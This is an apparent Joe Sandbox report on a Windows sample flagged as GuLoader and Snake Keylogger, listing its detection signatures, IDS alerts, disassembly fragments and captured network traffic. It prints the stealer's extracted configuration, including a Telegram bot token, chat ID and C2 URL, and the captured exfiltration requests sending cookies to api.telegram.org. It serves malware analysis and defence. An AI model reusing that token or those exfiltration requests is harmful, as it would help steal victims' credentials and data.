Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
4kobC6KGC3.exe

Overview

General Information

Sample name:4kobC6KGC3.exe
Analysis ID:1634887
MD5:108c208d6d523355b763e7a0284fa038
SHA1:79e0d305adf1a2f5a12c7539f3ad8164432a6840
SHA256:ae98bff3c519d8eff8b72857ff132b9c5b545ceaad056c8b5a08b8d107f2de5c
Infos:

Detection

GuLoader, Snake Keylogger
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected GuLoader
Yara detected Snake Keylogger
Yara detected Telegram RAT
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses the Telegram API (likely for C&C communication)
Allocates memory with a write watch (potentially for evading sandboxes)
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64native
  • 4kobC6KGC3.exe (PID: 8048 cmdline: "C:\Users\user\Desktop\4kobC6KGC3.exe" MD5: 108C208D6D523355B763E7A0284FA038)
    • 4kobC6KGC3.exe (PID: 1300 cmdline: "C:\Users\user\Desktop\4kobC6KGC3.exe" MD5: 108C208D6D523355B763E7A0284FA038)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
NameDescriptionAttributionBlogpost URLsLink
404 Keylogger, Snake KeyloggerSnake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "Telegram", "Token": "7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE", "Chat_id": "7695061973", "Version": "4.4"}
{"C2 url": "https://api.telegram.org/bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendMessage"}
SourceRuleDescriptionAuthorStrings
00000002.00000002.54536508892.0000000038131000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_TelegramRATYara detected Telegram RATJoe Security
    00000002.00000002.54536508892.0000000037FF1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_SnakeKeyloggerYara detected Snake KeyloggerJoe Security
      00000000.00000002.50858193838.0000000005BAE000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
        Process Memory Space: 4kobC6KGC3.exe PID: 1300JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          Process Memory Space: 4kobC6KGC3.exe PID: 1300JoeSecurity_TelegramRATYara detected Telegram RATJoe Security
            No Sigma rule has matched
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-11T06:30:19.149960+010028033053Unknown Traffic192.168.11.2049760104.21.64.1443TCP
            2025-03-11T06:30:19.771574+010028033053Unknown Traffic192.168.11.2049761104.21.64.1443TCP
            2025-03-11T06:30:20.755512+010028033053Unknown Traffic192.168.11.2049762104.21.64.1443TCP
            2025-03-11T06:30:21.386811+010028033053Unknown Traffic192.168.11.2049763104.21.64.1443TCP
            2025-03-11T06:30:22.031021+010028033053Unknown Traffic192.168.11.2049764104.21.64.1443TCP
            2025-03-11T06:30:23.656687+010028033053Unknown Traffic192.168.11.2049765104.21.64.1443TCP
            2025-03-11T06:30:24.277419+010028033053Unknown Traffic192.168.11.2049766104.21.64.1443TCP
            2025-03-11T06:30:24.900411+010028033053Unknown Traffic192.168.11.2049767104.21.64.1443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-11T06:30:17.521287+010028032742Potentially Bad Traffic192.168.11.2049758193.122.6.16880TCP
            2025-03-11T06:30:18.771003+010028032742Potentially Bad Traffic192.168.11.2049758193.122.6.16880TCP
            2025-03-11T06:30:19.380284+010028032742Potentially Bad Traffic192.168.11.2049758193.122.6.16880TCP
            2025-03-11T06:30:20.005102+010028032742Potentially Bad Traffic192.168.11.2049758193.122.6.16880TCP
            2025-03-11T06:30:20.989391+010028032742Potentially Bad Traffic192.168.11.2049758193.122.6.16880TCP
            2025-03-11T06:30:21.614204+010028032742Potentially Bad Traffic192.168.11.2049758193.122.6.16880TCP
            2025-03-11T06:30:23.270018+010028032742Potentially Bad Traffic192.168.11.2049758193.122.6.16880TCP
            2025-03-11T06:30:23.894906+010028032742Potentially Bad Traffic192.168.11.2049758193.122.6.16880TCP
            2025-03-11T06:30:24.526230+010028032742Potentially Bad Traffic192.168.11.2049758193.122.6.16880TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-11T06:30:13.316559+010028032702Potentially Bad Traffic192.168.11.2049756142.251.32.110443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-11T06:30:32.161790+010018100081Potentially Bad Traffic192.168.11.2049769149.154.167.220443TCP
            TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
            2025-03-11T06:30:25.736189+010018100071Potentially Bad Traffic192.168.11.2049768149.154.167.220443TCP

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: 00000002.00000002.54536508892.0000000037FF1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Snake Keylogger {"Exfil Mode": "Telegram", "Token": "7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE", "Chat_id": "7695061973", "Version": "4.4"}
            Source: 4kobC6KGC3.exe.1300.2.memstrminMalware Configuration Extractor: Telegram RAT {"C2 url": "https://api.telegram.org/bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendMessage"}
            Source: 4kobC6KGC3.exeVirustotal: Detection: 77%Perma Link
            Source: 4kobC6KGC3.exeReversingLabs: Detection: 63%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

            Location Tracking

            barindex
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AD7D3B0 CryptUnprotectData,2_2_3AD7D3B0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_3AD7DB10 CryptUnprotectData,2_2_3AD7DB10
            Source: 4kobC6KGC3.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknownHTTPS traffic detected: 104.21.64.1:443 -> 192.168.11.20:49759 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 142.251.32.110:443 -> 192.168.11.20:49756 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 142.250.65.193:443 -> 192.168.11.20:49757 version: TLS 1.2
            Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49768 version: TLS 1.2
            Source: 4kobC6KGC3.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 0_2_004065C7 FindFirstFileW,FindClose,0_2_004065C7
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405996
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_00402868 FindFirstFileW,2_2_00402868
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_004065C7 FindFirstFileW,FindClose,2_2_004065C7
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 2_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,2_2_00405996
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 075FF45Dh2_2_075FF2C0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 075FF45Dh2_2_075FF4AC
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 075FFC17h2_2_075FF95F
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AD72D41h2_2_3AD72A90
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AD70D0Dh2_2_3AD70B30
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AD716F8h2_2_3AD70B30
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AD73308h2_2_3AD72EF0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AD7FCA7h2_2_3AD7FA00
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AD73308h2_2_3AD73236
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_3AD70853
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_3AD70040
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AD73308h2_2_3AD72EEA
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h2_2_3AD70673
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then mov esp, ebp2_2_3AD7F769
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFBAA23h2_2_3AFBA6E8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFBB00Fh2_2_3AFBAD40
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB0B97h2_2_3AFB08F0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB8597h2_2_3AFB82F0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFBB9A6h2_2_3AFBB6D8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB556Fh2_2_3AFB52C8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFBD996h2_2_3AFBD6C8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB3B5Fh2_2_3AFB38B8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFBF986h2_2_3AFBF6B8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB214Fh2_2_3AFB1EA8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB073Fh2_2_3AFB0498
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB813Fh2_2_3AFB7E98
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFBA537h2_2_3AFBA290
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFBC756h2_2_3AFBC488
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFBE746h2_2_3AFBE478
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB5117h2_2_3AFB4E70
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB3707h2_2_3AFB3460
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB1CF7h2_2_3AFB1A50
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFBB516h2_2_3AFBB248
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB02E7h2_2_3AFB0040
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB7CE7h2_2_3AFB7A40
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFBA0DFh2_2_3AFB9E38
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFBD506h2_2_3AFBD238
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFBF4F6h2_2_3AFBF228
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB4CBFh2_2_3AFB4A18
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB32AFh2_2_3AFB3008
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB189Fh2_2_3AFB15F8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB92A1h2_2_3AFB8FF8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFBC2C6h2_2_3AFBBFF8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB788Fh2_2_3AFB75E8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFBE2B6h2_2_3AFBDFE8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB9C87h2_2_3AFB99E0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB6277h2_2_3AFB5FD0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB4867h2_2_3AFB45C0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB2E57h2_2_3AFB2BB0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFBD076h2_2_3AFBCDA8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB1447h2_2_3AFB11A0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB8E47h2_2_3AFB8BA0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFBF066h2_2_3AFBED98
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB7437h2_2_3AFB7190
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB982Fh2_2_3AFB9588
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB5E1Fh2_2_3AFB5B78
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB440Fh2_2_3AFB4168
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFBBE36h2_2_3AFBBB68
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB29FFh2_2_3AFB2758
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFBDE26h2_2_3AFBDB58
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB0FEFh2_2_3AFB0D48
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB89EFh2_2_3AFB8748
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFBFE16h2_2_3AFBFB48
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB59C7h2_2_3AFB5720
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFBCBE6h2_2_3AFBC918
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB3FB7h2_2_3AFB3D10
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFBEBD6h2_2_3AFBE908
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFB25A7h2_2_3AFB2300
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE42B6h2_2_3AFE3FE8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE64E0h2_2_3AFE61E8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE22C6h2_2_3AFE1FF8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFEBAF0h2_2_3AFEB7F8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE10BEh2_2_3AFE0DF0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE8FE8h2_2_3AFE8CF0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFEFDE0h2_2_3AFEFAE8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFED2D8h2_2_3AFECFE0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFEA7D0h2_2_3AFEA4D8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE079Eh2_2_3AFE04D0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE7CC8h2_2_3AFE79D0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE3996h2_2_3AFE36C8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFEEAC0h2_2_3AFEE7C8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFEBFB8h2_2_3AFEBCC0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE5986h2_2_3AFE56B8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE94B0h2_2_3AFE91B8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE69A8h2_2_3AFE66B0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE3076h2_2_3AFE2DA8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFED7A0h2_2_3AFED4A8
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFEAC98h2_2_3AFEA9A0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE5066h2_2_3AFE4D98
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE8190h2_2_3AFE7E98
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFEEF88h2_2_3AFEEC90
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE2756h2_2_3AFE2488
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFEC480h2_2_3AFEC188
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE154Eh2_2_3AFE1280
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE9978h2_2_3AFE9680
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE4747h2_2_3AFE4478
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE6E70h2_2_3AFE6B78
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFEDC68h2_2_3AFED970
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE1E36h2_2_3AFE1B68
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFEB160h2_2_3AFEAE68
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE0C2Eh2_2_3AFE0960
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE8658h2_2_3AFE8360
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE3E26h2_2_3AFE3B58
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFEF450h2_2_3AFEF158
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFEC948h2_2_3AFEC650
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE5EB7h2_2_3AFE5B48
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE9E40h2_2_3AFE9B48
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE030Eh2_2_3AFE0040
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE7338h2_2_3AFE7040
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE3506h2_2_3AFE3238
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFEE130h2_2_3AFEDE38
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFEB628h2_2_3AFEB330
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE54F6h2_2_3AFE5228
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE8B20h2_2_3AFE8828
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFEF918h2_2_3AFEF620
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE2BE6h2_2_3AFE2918
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFECE10h2_2_3AFECB18
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE19B7h2_2_3AFE1710
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFEA308h2_2_3AFEA010
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE4BD6h2_2_3AFE4908
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFE7800h2_2_3AFE7508
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3AFEE5F8h2_2_3AFEE300
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3B001B20h2_2_3B001828
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3B000800h2_2_3B000508
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3B001658h2_2_3B001360
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3B000CC8h2_2_3B0009D0
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3B000339h2_2_3B000040
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then jmp 3B001190h2_2_3B000E98
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]2_2_3B043F70
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]2_2_3B043F60
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]2_2_3B040AC4
            Source: C:\Users\user\Desktop\4kobC6KGC3.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]2_2_3B040AD0

            Networking

            barindex
            Source: Network trafficSuricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.11.20:49769 -> 149.154.167.220:443
            Source: Network trafficSuricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.11.20:49768 -> 149.154.167.220:443
            Source: unknownDNS query: name: api.telegram.org
            Source: global trafficHTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /xml/191.96.227.220 HTTP/1.1Host: reallyfreegeoip.org
            Source: global trafficHTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:980108%0D%0ADate%20and%20Time:%2011/03/2025%20/%2001:30:23%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20980108%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: POST /bot7745751910:AAGY46QDCTWO_Pw9iDqZhkNij-i4uwbMgzE/sendDocument?chat_id=7695061973&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0ACookies%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd603c4f928882Host: api.telegram.orgContent-Length: 2064
            Source: Joe Sandbox ViewIP Address: 149.154.167.220 149.154.167.220
            Source: Joe Sandbox ViewIP Address: 193.122.6.168 193.122.6.168
            Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
            Source: Joe Sandbox ViewIP Address: 104.21.64.1 104.21.64.1
            Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
            Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
            Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
            Source: unknownDNS query: name: checkip.dyndns.org
            Source: unknownDNS query: name: reallyfreegeoip.org
            Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.11.20:49758 -> 193.122.6.168:80
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49760 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49764 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49762 -> 104.21.64.1:443
            Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.11.20:49756 -> 142.251.32.110:443
            Source: Network trafficSuricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.11.20:49761 -> 104.21.64.1:443
